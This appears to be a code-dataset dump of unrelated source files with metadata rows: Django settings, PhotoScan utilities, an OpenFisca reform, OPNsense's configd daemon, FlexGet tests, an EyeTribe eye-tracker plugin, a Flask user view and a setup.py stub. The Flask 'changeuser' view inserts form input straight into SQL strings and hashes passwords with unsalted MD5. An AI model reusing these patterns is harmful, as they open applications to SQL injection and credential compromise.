ROOT_URLCONF = 'qoala.urls'
WSGI_APPLICATION = 'qoala.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
#LANGUAGE_CODE = 'en-us'
LANGUAGE_CODE = 'ru'
LANGUAGES = (
('ru', 'Russian'),
('en', 'English'),
)
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
TIME_ZONE = 'Asia/Yekaterinburg'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.example.com/static/"
STATIC_ROOT = os.path.join(PROJECT_DIR, 'static')
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "base/static"),
)
# Sessions
#
# By default, be at least somewhat secure with our session cookies.
SESSION_COOKIE_HTTPONLY = True
def custom_show_toolbar(request):
""" Only show the debug toolbar to users with the superuser flag. """
return request.user.is_superuser
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TOOLBAR_CALLBACK': 'qoala.settings.custom_show_toolbar',
'SHOW_TEMPLATE_CONTEXT': True,
'ENABLE_STACKTRACES': True,
}
DEBUG_TOOLBAR_PATCH_SETTINGS = False
# Uncomment these to activate and customize Celery:
# CELERY_ALWAYS_EAGER = False # required to activate celeryd
#BROKER_URL = 'amqp://guest:guest@localhost//'
| gpl-3.0 | -744,898,877,219,937,500 | 25.130682 | 102 | 0.724288 | false | 3.247881 | false | false | false |
rmsare/sfmtools | sfmtools.py | 1 | 2864 | """ Utility functions for PhotoScan processing """
import os, sys
import PhotoScan
def align_and_clean_photos(chunk):
ncameras = len(chunk.cameras)
for frame in chunk.frames:
frame.matchPhotos()
chunk.alignCameras()
for camera in chunk.cameras:
if camera.transform is None:
chunk.remove(camera)
naligned = len(chunk.cameras)
print('%d/%d cameras aligned' % (naligned, ncameras))
def batch_process(projectname, threshold, resolution):
doc = PhotoScan.app.document
    if projectname[-4:] != '.psz':
projectname = ''.join([projectname, '.psz'])
if os.path.isfile(projectname):
doc.open(projectname)
folders = ['dems', 'reports', 'orthos']
for folder in folders:
if not os.path.isdir(folder):
os.mkdir(folder)
for chunk in doc.chunks:
filter_photos_by_quality(chunk, threshold)
align_and_clean_photos(chunk)
chunk.buildDenseCloud(quality=PhotoScan.HighQuality)
doc.alignChunks(doc.chunks, doc.chunks[0])
doc.mergeChunks(doc.chunks, merge_dense_clouds=True, merge_markers=True)
chunk = doc.chunks[len(doc.chunks)-1]
chunk.buildModel(surface=PhotoScan.HeightField, face_count=PhotoScan.HighFaceCount)
chunk.exportDem('dems/test_0.5m.tif', format='tif', dx=0.5, dy=0.5)
#export_dems('dems/', 'tif', resolution)
#export_orthos('orthos/', resolution)
for chunk in doc.chunks:
filename = ''.join(['reports/', ''.join(chunk.label.split(' ')), '.pdf'])
chunk.exportReport(filename)
doc.save(projectname)
def export_dems(pathname, formatstring, resolution):
if not os.path.isdir(pathname):
os.mkdir(pathname)
    if pathname[-1:] != '/':
pathname = ''.join([pathname, '/'])
nchunks = len(PhotoScan.app.document.chunks)
nexported = nchunks
for chunk in PhotoScan.app.document.chunks:
filename = ''.join([pathname, ''.join(chunk.label.split(' ')), '.', formatstring])
exported = chunk.exportDem(filename, format=formatstring)
if not exported:
print('Export failed:', chunk.label)
nexported -= 1
print('%d/%d DEMs exported' % (nexported, nchunks))
def filter_photos_by_quality(chunk, threshold):
for camera in chunk.cameras:
if camera.frames[0].photo.meta['Image/Quality'] is None:
chunk.estimateImageQuality([camera])
if float(camera.frames[0].photo.meta['Image/Quality']) < threshold:
chunk.remove(camera)
def load_masks_for_chunk(chunk, mask_dir):
for camera in chunk.cameras:
label = camera.label
mask_fname = mask_dir + label + '_mask.png'
if os.path.isfile(mask_fname):
this_mask = PhotoScan.Mask.load(mask_fname)
camera.mask = this_mask
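# Example workflow (editorial sketch; the paths, threshold and resolution are
# hypothetical and PhotoScan supplies the active document):
#
#     import PhotoScan
#     chunk = PhotoScan.app.document.chunks[0]
#     filter_photos_by_quality(chunk, threshold=0.5)
#     align_and_clean_photos(chunk)
#     export_dems('dems/', 'tif', 0.5)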
| mit | -1,115,124,108,005,124,100 | 33.506024 | 90 | 0.633729 | false | 3.602516 | false | false | false |
MalkIPP/ipp_work | ipp_work/reforms/ir_marg_rate.py | 1 | 2157 | # -*- coding: utf-8 -*-
# OpenFisca -- A versatile microsimulation software
# By: OpenFisca Team <[email protected]>
#
# Copyright (C) 2011, 2012, 2013, 2014, 2015 OpenFisca Team
# https://github.com/openfisca
#
# This file is part of OpenFisca.
#
# OpenFisca is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# OpenFisca is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division
import logging
from openfisca_core import formulas, reforms
from openfisca_france.model.prelevements_obligatoires.impot_revenu import ir
log = logging.getLogger(__name__)
class rni(formulas.SimpleFormulaColumn):
reference = ir.rni
label = u"Revenu net imposable"
url = "http://impotsurlerevenu.org/definitions/115-revenu-net-imposable.php"
def function(self, simulation, period):
        ''' Net taxable income ("revenu net imposable") or deficit to carry forward '''
period = period.start.offset('first-of', 'month').period('year')
rng = simulation.calculate('rng', period)
abat_spe = simulation.calculate('abat_spe', period)
print "passe par simulation"
return period, rng - abat_spe + 10
def build_reform(tax_benefit_system):
# reference_legislation_json = tax_benefit_system.legislation_json
# reform_legislation_json = copy.deepcopy(reference_legislation_json)
# reform_legislation_json['children'].update(reform_legislation_subtree)
Reform = reforms.make_reform(
# legislation_json = reform_legislation_json,
name = u'Revenu imposable + 10',
new_formulas = [rni],
reference = tax_benefit_system,
)
return Reform()
| agpl-3.0 | 397,067,888,802,936,060 | 32.153846 | 80 | 0.713225 | false | 3.415214 | false | false | false |
opnsense/core | src/opnsense/service/configd.py | 1 | 6724 | #!/usr/local/bin/python3
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2019 Ad Schellevis <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------------
package : configd
function: delivers a process coordinator to handle frontend functions
"""
import os
import sys
import logging
import signal
import time
import socket
import subprocess
import syslog
import modules.processhandler
import modules.csconfigparser
from modules.daemonize import Daemonize
import cProfile
# find program path
program_path = os.path.dirname(os.path.abspath(__file__))
# set working directory to program_path
sys.path.append(program_path)
os.chdir(program_path)
def get_config():
""" open configuration
"""
cnf = modules.csconfigparser.CSConfigParser()
cnf.read('conf/configd.conf')
return cnf
def validate_config(cnf):
""" validate configuration, exit on missing item
:param cnf: config handle
"""
for config_item in ['socket_filename', 'pid_filename']:
        if not cnf.has_section('main') or not cnf.has_option('main', config_item):
print('configuration item main/%s not found in %s/conf/configd.conf' % (config_item, program_path))
sys.exit(0)
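# For reference, a minimal conf/configd.conf accepted by validate_config() could
# look like this (values are illustrative examples, not shipped defaults):
#
#     [main]
#     socket_filename = /var/run/configd.socket
#     pid_filename = /var/run/configd.pid
#
#     [environment]
#     PATH = /sbin:/bin:/usr/sbin:/usr/bin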
def main(cnf, simulate=False, single_threaded=False):
""" configd startup
:param cnf: config handle
:param simulate: simulate only
:param single_threaded: start single threaded
"""
# setup configd environment to use for all configured actions
if not cnf.has_section('environment'):
config_environment = os.environ.copy()
else:
config_environment = dict()
for envKey in cnf.items('environment'):
config_environment[envKey[0]] = envKey[1]
# run process coordinator ( on console or as daemon )
    # if simulation was requested (the "simulate" command-line argument), run in simulation mode
if simulate:
proc_handler = modules.processhandler.Handler(socket_filename=cnf.get('main', 'socket_filename'),
config_path='%s/conf' % program_path,
config_environment=config_environment,
simulation_mode=True)
else:
proc_handler = modules.processhandler.Handler(socket_filename=cnf.get('main', 'socket_filename'),
config_path='%s/conf' % program_path,
config_environment=config_environment)
proc_handler.single_threaded = single_threaded
proc_handler.run()
def run_watch():
""" start configd process and restart if it dies unexpected
"""
current_child_pid = None
def signal_handler(sig, frame):
if current_child_pid is not None:
os.kill(current_child_pid, sig)
sys.exit(1)
signal.signal(signal.SIGTERM, signal_handler)
while True:
process = subprocess.Popen(['/usr/local/opnsense/service/configd.py', 'console'])
# save created pid for signal_handler() to use
current_child_pid = process.pid
process.wait()
# wait a small period of time before trying to restart a new process
time.sleep(0.5)
this_config = get_config()
validate_config(this_config)
if len(sys.argv) > 1 and 'console' in sys.argv[1:]:
print('run %s in console mode' % sys.argv[0])
syslog.openlog("configd.py")
if 'profile' in sys.argv[1:]:
# profile configd
# for graphical output use gprof2dot:
# gprof2dot -f pstats /tmp/configd.profile -o /tmp/callingGraph.dot
# (https://code.google.com/p/jrfonseca/wiki/Gprof2Dot)
print ("...<ctrl><c> to stop profiling")
profile = cProfile.Profile()
profile.enable(subcalls=True)
try:
if len(sys.argv) > 1 and 'simulate' in sys.argv[1:]:
print('simulate calls.')
main(cnf=this_config, simulate=True, single_threaded=True)
else:
main(cnf=this_config, single_threaded=True)
except KeyboardInterrupt:
pass
except:
raise
profile.disable()
profile.dump_stats('/tmp/configd.profile')
else:
main(cnf=this_config)
else:
# run as daemon, wrap the actual work process to enable automatic restart on sudden death
syslog_socket = "/var/run/log"
if os.path.exists(syslog_socket):
try:
# bind log handle to syslog to catch messages from Daemonize()
# (if syslog facility is active)
loghandle = logging.getLogger("configd.py")
loghandle.setLevel(logging.INFO)
handler = logging.handlers.SysLogHandler(address=syslog_socket,
facility=logging.handlers.SysLogHandler.LOG_DAEMON)
handler.setFormatter(logging.Formatter("%(name)s %(message)s"))
loghandle.addHandler(handler)
except socket.error:
loghandle = None
else:
loghandle = None
# daemonize process
daemon = Daemonize(app=__file__.split('/')[-1].split('.py')[0],
pid=this_config.get('main', 'pid_filename'),
action=run_watch,
logger=loghandle
)
daemon.start()
sys.exit(0)
| bsd-2-clause | 5,773,901,483,905,628,000 | 37.867052 | 111 | 0.625074 | false | 4.369071 | true | false | false |
qvazzler/Flexget | tests/test_utils.py | 1 | 1326 | from __future__ import unicode_literals, division, absolute_import
from builtins import * # pylint: disable=unused-import, redefined-builtin
from datetime import datetime
from flexget.utils import json
class TestJson(object):
def test_json_encode_dt(self):
date_str = '2016-03-11T17:12:17Z'
dt = datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%SZ')
encoded_dt = json.dumps(dt, encode_datetime=True)
assert encoded_dt == '"%s"' % date_str
def test_json_encode_dt_dict(self):
date_str = '2016-03-11T17:12:17Z'
dt = datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%SZ')
date_obj = {'date': dt}
encoded_dt = json.dumps(date_obj, encode_datetime=True)
assert encoded_dt == '{"date": "%s"}' % date_str
def test_json_decode_dt(self):
date_str = '"2016-03-11T17:12:17Z"'
dt = datetime.strptime(date_str, '"%Y-%m-%dT%H:%M:%SZ"')
decoded_dt = json.loads(date_str, decode_datetime=True)
assert dt == decoded_dt
def test_json_decode_dt_obj(self):
date_str = '"2016-03-11T17:12:17Z"'
date_obj_str = '{"date": %s}' % date_str
decoded_dt = json.loads(date_obj_str, decode_datetime=True)
dt = datetime.strptime(date_str, '"%Y-%m-%dT%H:%M:%SZ"')
assert decoded_dt == {'date': dt}
| mit | 7,716,064,691,289,933,000 | 35.833333 | 74 | 0.602564 | false | 3.069444 | false | false | false |
infant-cognition-tampere/drop-eyetribe-plugin | drop_eyetribe/EyetrackerEyeTribe.py | 1 | 20648 | """TheEyeTribe plugin for drop."""
from drop.Sensor import Sensor
from threading import Thread
from Queue import Queue
import socket
from select import select
import json
import nudged
import glib
import os
import re
from datetime import datetime
import time
import csv
# Regular expression to match timestamp format given by eyetribe server.
# Compiled initially during import of module.
_timestamp_matcher = re.compile(
"^(?P<year>[0-9]{4})-(?P<month>[0-9]{2})-(?P<day>[0-9]{2}) "
"(?P<hour>[0-9]{2}):(?P<minute>[0-9]{2}):(?P<second>[0-9]{2})\."
"(?P<millisecond>[0-9]{3})$")
def _parse_timestamp(ts):
m = _timestamp_matcher.match(ts)
dt = datetime(year=int(m.group('year')),
month=int(m.group('month')),
day=int(m.group('day')),
hour=int(m.group('hour')),
minute=int(m.group('minute')),
second=int(m.group('second')),
microsecond=int(
m.group('millisecond')) * 1000)
return ((time.mktime(dt.timetuple()) * 1000) +
(dt.microsecond / 1000)) * 1000.0
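# Rough worked example (editorial note): for an input such as
# "2016-03-11 17:12:17.123" the regex above captures the date/time fields and
# _parse_timestamp() returns the corresponding epoch time in microseconds
# (local-time interpretation), i.e. (mktime(...) * 1000 + 123) * 1000.0.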
def _get_validity_from_state(state):
if state & 0x1 and state & 0x2 and state & 0x4:
return 0
return -1
def _convert_gazedata_frame(frame):
# >LeftEyeNx
# >LeftEyeNy
# >LeftEyePosition3dRelativeX
# >LeftEyePosition3dRelativeY
# LeftEyePosition3dRelativeZ ?
# LeftEyePosition3dX
# LeftEyePosition3dY
# LeftEyePosition3dZ
# >LeftEyePupilDiameter
# >RightEyeNx
# >RightEyeNy
# >RightEyePosition3dRelativeX
# >RightEyePosition3dRelativeY
# RightEyePosition3dRelativeZ ?
# RightEyePosition3dX ?
# RightEyePosition3dY ?
# RightEyePosition3dZ ?
# >RightEyePupilDiameter
# >TETTime
# >ValidityLeftEye
# >ValidityRightEye
# >XGazePosLeftEye
# >XGazePosRightEye
# >YGazePosLeftEye
# >YGazePosRightEye
row = {'XGazePosLeftEye': frame['lefteye']['raw']['x'],
'YGazePosLeftEye': frame['lefteye']['raw']['y'],
'XGazePosRightEye': frame['righteye']['raw']['x'],
'YGazePosRightEye': frame['righteye']['raw']['y'],
'LeftEyeNx': frame['lefteye_nudged']['raw']['x'],
'LeftEyeNy': frame['lefteye_nudged']['raw']['y'],
'RightEyeNx': frame['righteye_nudged']['raw']['x'],
'RightEyeNy': frame['righteye_nudged']['raw']['y'],
'LeftEyePosition3dRelativeX':
1.0 - frame['lefteye']['pcenter']['x'],
'LeftEyePosition3dRelativeY':
frame['lefteye']['pcenter']['y'],
'RightEyePosition3dRelativeX':
1.0 - frame['righteye']['pcenter']['x'],
'RightEyePosition3dRelativeY':
frame['righteye']['pcenter']['y'],
'LeftEyePupilDiameter': frame['lefteye']['psize'],
'RightEyePupilDiameter': frame['righteye']['psize'],
'ValidityBothEyes':
_get_validity_from_state(frame['state']),
'TETTime':
_parse_timestamp(frame['timestamp'])}
return row
def _convert_json_to_tabdelim(source_filename, dest_filename):
"""Convert file from JSON to CSV format."""
with open(source_filename, 'r') as json_file:
json_lines = json_file.readlines()
json_objects = map(json.loads, json_lines)
json_frames = filter(lambda x: 'frame' in x, json_objects)
json_tags = filter(lambda x: 'tag' in x, json_objects)
frame_dicts = [_convert_gazedata_frame(f['frame']) for f in json_frames]
frame_keys = list(frozenset(reduce(
lambda x, y: x + y, [d.keys() for d in frame_dicts])))
tag_keys = list(frozenset(reduce(
lambda x, y: x + y, [t['tag'].keys() for t in json_tags])))
tag_keys = filter(lambda x: x != 'secondary_id', tag_keys)
# Generate list of start-end tags
# Assuming that start and end tags always follow each other and that
# there are even amount of tags
assert len(json_tags) % 2 == 0
tags = zip(*[iter([t['tag'] for t in json_tags])]*2)
# Modify frame dicts to contain tag information where present
for f in frame_dicts:
frame_time = f['TETTime'] / (1000 * 1000)
for t in tags:
assert t[0]['secondary_id'] == 'start' and \
t[1]['secondary_id'] == 'end'
start_time = t[0]['timestamp']
end_time = t[1]['timestamp']
if frame_time > start_time and frame_time < end_time:
tagdict = {k: str(v) for k, v in t[0].iteritems()}
tagdict.pop('secondary_id')
f.update(tagdict)
with open(dest_filename, 'w') as csv_file:
writer = csv.DictWriter(csv_file,
fieldnames=frame_keys + tag_keys,
dialect='excel-tab')
writer.writeheader()
writer.writerows(frame_dicts)
class EyeTribeSocket(Thread):
"""Thread for socket-based communication with EyeTribe server."""
def __init__(self, host="localhost", port=6555, callback=None):
"""Constructor."""
super(EyeTribeSocket, self).__init__()
# Handle messages with callback
self.callback = callback
# Create new non-blocking socket and connect
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((host, port))
self.sock.setblocking(0)
self.send_queue = Queue()
def send(self, msg):
"""
        Put a packet into the send queue.
        The thread's main loop will send it during the next sending phase.
"""
# TODO MAYBE: Check message validity before sending
# Put message into send_queue
self.send_queue.put(msg)
def run(self):
"""Main loop of the socket thread."""
partial_data = ""
while self.should_run:
# Get stuff from send_queue and send
while not self.send_queue.empty():
msg = self.send_queue.get(False)
self.sock.send(msg)
self.send_queue.task_done()
# Select from sockets
# TODO: Somewhat hacky solution to use 0.01 timeout,
# examine the possibility to use "signals."
read_sockets, write_sockets, err_sockets = \
select([self.sock], [], [], 0.01)
for sock in read_sockets:
if sock == self.sock:
read_data = sock.recv(512)
if not read_data:
raise IOError
read_data = partial_data + read_data
msgs = read_data.split('\n')
for msg in msgs[:-1]:
# Do a callback for received messages
if self.callback is not None:
self.callback(msg)
partial_data = msgs[-1]
def start(self):
"""Start the socket thread."""
self.should_run = True
return super(EyeTribeSocket, self).start()
def stop(self):
"""Cause the socket loop to exit."""
self.should_run = False
class EyeTribe(object):
"""
Class for interfacing with EyeTribe tracker.
Mostly handles
serialization with The Eye Tribe server and encapsulates a socket
thread.
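
    Minimal usage sketch (editorial example; the frame callback is hypothetical):

        def on_frame(frame):
            print frame['timestamp']

        tracker = EyeTribe("localhost", 6555, cb_frame=on_frame)
        tracker.start()
        # ... consume frames ...
        tracker.stop()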
"""
get_value_keywords = [
'push',
'heartbeatinterval',
'version',
'trackerstate',
'framerate',
'iscalibrated',
'iscalibrating',
'screenindex',
'screenresw',
'screenresh',
'screenpsyw',
'screenpsyh'
]
valid_keywords = get_value_keywords + ['calibresult', 'frame']
def __init__(self, host, port, cb_frame=None):
"""Constructor."""
self.host = host
self.port = port
self.sockthread = None
self.cb_frame = cb_frame
self.values = {}
def _init_socket(self):
if self.sockthread is not None:
return
self.sockthread = EyeTribeSocket(self.host,
self.port,
self._msg_handler)
self.sockthread.start()
def _msg_handler(self, raw_msg):
# Decode msg
msg = json.loads(raw_msg)
# assert msg.get('statuscode') == 200
if msg.get('category') == 'tracker':
# Update internal value dict
self.values.update(msg.get('values', {}))
# If frame, do a frame callback
if 'frame' in msg.get('values', {}):
self.cb_frame(msg.get('values').get('frame'))
def _gen_request(self, category, request, values):
# TODO: Some parameter validity checking here
return {'category': category,
'request': request,
'values': values}
def _gen_set_values_msg(self, values):
v = dict()
v.update(values)
v.update({'version': 2})
return self._gen_request('tracker', 'set', v)
def _gen_get_values_msg(self, values):
return self._gen_request('tracker', 'get', values)
def _gen_set_push_msg(self, state):
return self._gen_set_values_msg({'push': state})
def _start_push(self):
"""Start push mode."""
self.sockthread.send(json.dumps(self._gen_set_push_msg(True)))
def _stop_push(self):
"""Stop push mode."""
# TODO: EyeTribe server does not stop sending data after stop push
# request.
self.sockthread.send(json.dumps(self._gen_set_push_msg(False)))
def start(self):
"""Start the Eye Tribe."""
self._init_socket()
# First request all relevant values from eyetribe server
self.sockthread.send(json.dumps(self._gen_get_values_msg(
self.get_value_keywords)))
# Then start push mode
self._start_push()
def stop(self):
"""Stop the Eye Tribe."""
self._stop_push()
self.sockthread.stop()
del self.sockthread
self.sockthread = None
class EyeTribeET(Sensor):
"""Plugin class for drop."""
def __init__(self, rootdir, savedir, on_created, on_error):
"""Constructor."""
# run the superclass constructor
super(EyeTribeET, self).__init__()
self.type = 'Eyetracker'
self.control_elements = []
self.device_id = "Eyetribe eyetracker"
self.on_created = on_created
self.on_error = on_error
self.tracker = EyeTribe("localhost", 6555, self._handle_frame_callback)
self.tracker.start()
# nudged calibration values
self.nudged_current_range = None
self.nudged_domain_r = []
self.nudged_domain_l = []
self.nudged_range = []
self.nudged_transform_r = nudged.Transform(1, 0, 0, 0)
self.nudged_transform_l = nudged.Transform(1, 0, 0, 0)
self.collect_data = False
glib.idle_add(self.on_created, self)
def _handle_frame_callback(self, frame):
glib.idle_add(self._handle_gazedata_frame, frame)
def _inside_aoi(self, x, y, aoi):
return aoi[0] < x and x < aoi[1] and aoi[2] < y and y < aoi[3]
def _data_condition_check(self, rx, ry, lx, ly):
# TODO: Move this function to superclass
"""
Data condition check.
        Returns True if a data condition is met, False otherwise.
"""
for cond in self.data_conditions:
if cond["type"] == "aoi":
if cond["inorout"] == "in" and \
(self._inside_aoi(rx, ry, cond["aoi"]) or
self._inside_aoi(lx, ly, cond["aoi"])):
self.data_conditions = []
return True
return False
def _handle_gazedata_frame(self, frame):
# TODO: Create a superclass version of this
# Parsing
screen_w = self.tracker.values['screenresw']
screen_h = self.tracker.values['screenresh']
gaze_left_x = frame['lefteye']['raw']['x'] / screen_w
gaze_left_y = frame['lefteye']['raw']['y'] / screen_h
gaze_right_x = frame['righteye']['raw']['x'] / screen_w
gaze_right_y = frame['righteye']['raw']['y'] / screen_h
# Put normalized coordinates back into frame
frame['lefteye']['raw']['x'] = gaze_left_x
        frame['lefteye']['raw']['y'] = gaze_left_y
frame['righteye']['raw']['x'] = gaze_right_x
frame['righteye']['raw']['y'] = gaze_right_y
# TODO: Do normalization and transforms for avg coordinates as well
# Nudged transform
gaze_left_nx, gaze_left_ny = \
self.nudged_transform_l.transform([gaze_left_x, gaze_left_y])
gaze_right_nx, gaze_right_ny = \
self.nudged_transform_r.transform([gaze_right_x, gaze_right_y])
# Write data to file if recording has started
frame.update({
            'lefteye_nudged': {'raw': {'x': gaze_left_nx, 'y': gaze_left_ny}},
            'righteye_nudged': {'raw': {'x': gaze_right_nx, 'y': gaze_right_ny}}
})
if self.collect_data:
self.collect_file.write(json.dumps({'frame': frame}) + '\n')
# Calibration & linear transformation section
if self.nudged_current_range is not None:
# If tracking both gaze and eyes (as a validity check)
if frame['state'] & 0x3 != 0:
self.nudged_range.append(self.nudged_current_range)
self.nudged_domain_l.append([gaze_left_x, gaze_left_y])
self.nudged_domain_r.append([gaze_right_x, gaze_right_y])
# Data condition check
dc_nudged = self._data_condition_check(gaze_right_nx,
gaze_right_ny,
gaze_left_nx,
gaze_left_ny)
dc_uncalibrated = self._data_condition_check(gaze_right_x,
gaze_right_y,
gaze_left_x,
gaze_left_y)
if dc_nudged or dc_uncalibrated:
self.emit("draw_que_updated")
self.emit("data_condition_met")
# Draw eyes and gaze positions
for eye in ['left', 'right']:
self.draw_eye(eye, frame[eye + 'eye'], 1.0)
self.draw_gaze('left', gaze_left_x, gaze_left_y, 1.0)
self.draw_gaze('right', gaze_right_x, gaze_right_y, 1.0)
self.draw_gaze('leftN', gaze_left_nx, gaze_left_ny, 1.0,
{'r': 1, 'g': 1, 'b': 1})
self.draw_gaze('rightN', gaze_right_nx, gaze_right_ny, 1.0,
{'r': 1, 'g': 1, 'b': 1})
def trial_started(self, tn, tc):
"""Called when trial has started."""
return False
def trial_completed(self, name, tn, tc, misc):
"""Called when trial has completed."""
return False
def tag(self, tag):
"""Called when tag needs to be inserted into data."""
if self.collect_data:
self.collect_file.write(json.dumps({'tag': tag}) + '\n')
# check if validity is to be calculated
if tag["secondary_id"] == "start":
# go to nudged calibration mode
if "nudged_point" in tag:
# Nudged point format: "1.0, 0.5"
[x, y] = tag["nudged_point"].split(",")
xf = float(x)
yf = float(y)
self.nudged_current_range = [xf, yf]
# check if previous occurrances of this point exist
while [xf, yf] in self.nudged_range:
# find the index of the element in range
ind = self.nudged_range.index([xf, yf])
# remove the index from range and domains
self.nudged_range.pop(ind)
self.nudged_domain_l.pop(ind)
self.nudged_domain_r.pop(ind)
elif tag["secondary_id"] == "end":
if "nudged_point" in tag:
self.nudged_current_range = None
# calculate nudged transform
print "Calculating nudged calibration for right eye with " + \
"vectors: dom[" + str(len(self.nudged_domain_r)) + \
"] and range[" + str(len(self.nudged_range))
self.nudged_transform_r = nudged.estimate(self.nudged_domain_r,
self.nudged_range)
print "Calculating new calibration..."
self.nudged_transform_l = nudged.estimate(self.nudged_domain_l,
self.nudged_range)
return False
def action(self, action_id):
"""Perform actions for the control elements defined."""
print "ET: ACTION"
return False
def get_type(self):
"""Get 'type' of eye tracker."""
return self.type
def add_data_condition(self, condition):
"""Add data condition."""
print "ET: ADD DATA CONDITION"
return False
def get_device_id(self):
"""Get id of the device."""
return self.device_id
def get_control_elements(self):
"""Get control elements."""
return self.control_elements
def stop_recording(self):
"""Called when recording should be stopped."""
if self.collect_data:
self.collect_data = False
self.collect_file.close()
_convert_json_to_tabdelim(self.collect_filename + '.json',
self.collect_filename)
def start_recording(self, rootdir, participant_id, experiment_file,
section_id):
"""Called when recording should be started."""
assert not self.collect_data
expname = os.path.basename(experiment_file).split('.')[0]
fname = '%s_%s_%s.gazedata' % (expname,
participant_id,
section_id)
fname = os.path.join(rootdir, fname)
json_fname = fname + '.json'
self.collect_file = open(json_fname, 'w')
self.collect_filename = fname
metadata = json.dumps({'metadata': self.tracker.values})
self.collect_file.write(metadata + '\n')
self.collect_data = True
def disconnect(self):
"""Called when disconnect has been requested from GUI."""
self.tracker.stop()
self.emit("clear_screen")
self.remove_all_listeners()
return False
def draw_gaze(self, eye, gazepos_x, gazepos_y, opacity,
color={'r': 0, 'g': 0, 'b': 1}):
"""Draw one gazepoint."""
radius = 0.02
self.emit("add_draw_que",
eye,
{"type": "circle",
"r": color['r'],
"g": color['g'],
"b": color['b'],
"o": opacity,
"x": gazepos_x,
"y": gazepos_y,
"radius": radius})
def draw_eye(self, eye, frame_eye, opacity):
"""Draw one eye."""
camera_pos_x = 1.0 - frame_eye['pcenter']['x']
camera_pos_y = frame_eye['pcenter']['y']
screen_w = self.tracker.values['screenresw']
screen_h = self.tracker.values['screenresh']
gazepos_x = frame_eye['raw']['x'] / screen_w
gazepos_y = frame_eye['raw']['y'] / screen_h
point_x = gazepos_x - .5
point_y = gazepos_y - .5
ball_radius = 0.075
iris_radius = 0.03
pupil_radius = 0.01
x = 1 - camera_pos_x
y = camera_pos_y
self.emit("add_draw_que", eye + "ball",
{"type": "circle", "r": 1, "g": 1, "b": 1,
"o": opacity, "x": x, "y": y, "radius": ball_radius})
x = 1 - camera_pos_x + ((ball_radius - iris_radius / 2) * point_x)
y = camera_pos_y + ((ball_radius - iris_radius / 2) * point_y)
self.emit("add_draw_que", eye + "iris",
{"type": "circle", "r": 0.5, "g": 0.5, "b": 1,
"o": opacity, "x": x, "y": y, "radius": iris_radius})
self.emit("add_draw_que", eye + "pupil",
{"type": "circle", "r": 0, "g": 0, "b": 0,
"o": opacity, "x": x, "y": y, "radius": pupil_radius})
def __del__(self):
"""Destructor."""
print self.device_id + " disconnected."
| mit | 9,056,282,555,783,877,000 | 33.18543 | 79 | 0.531916 | false | 3.670103 | false | false | false |
MissRoven/python | demo/app/mangeruser.py | 1 | 1063 | from . import app
import json
from flask import request,render_template,redirect,make_response,session
@app.route('/upuser')
def adduser():
return render_template('up.html',username=session['username'])
@app.route('/changeuser',methods=['POST'])
def changeuser():
change = request.form.get('change')
username =request.form.get('username')
if "show" == change:
sql = 'select * from user where username = "%s"'%(username)
tmp = app.config['cursor']._execute(sql)
cur=tmp['cur'].fetchall()
return json.dumps(cur)
elif "update" == change:
password =request.form.get('password')
email =request.form.get('email')
age =request.form.get('age')
sex =request.form.get('sex')
address =request.form.get('address')
sql = 'update user set password=md5("%s"),email="%s",age="%s",sex="%s",address="%s" where username="%s" '%(password,email,age,sex,address,username)
print sql
tmp = app.config['cursor']._execute(sql)
cur=tmp['msg']
return cur
| gpl-2.0 | -9,161,075,792,723,971,000 | 36.964286 | 155 | 0.621825 | false | 3.640411 | false | false | false |
crawfordsm/indlulamithi | setup.py | 1 | 3745 | #!/usr/bin/env python
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import glob
import os
import sys
import ah_bootstrap
from setuptools import setup
# A dirty hack to get around some early import/configuration ambiguities
if sys.version_info[0] >= 3:
import builtins
else:
import __builtin__ as builtins
builtins._ASTROPY_SETUP_ = True
from astropy_helpers.setup_helpers import (
register_commands, adjust_compiler, get_debug_option, get_package_info)
from astropy_helpers.git_helpers import get_git_devstr
from astropy_helpers.version_helpers import generate_version_py
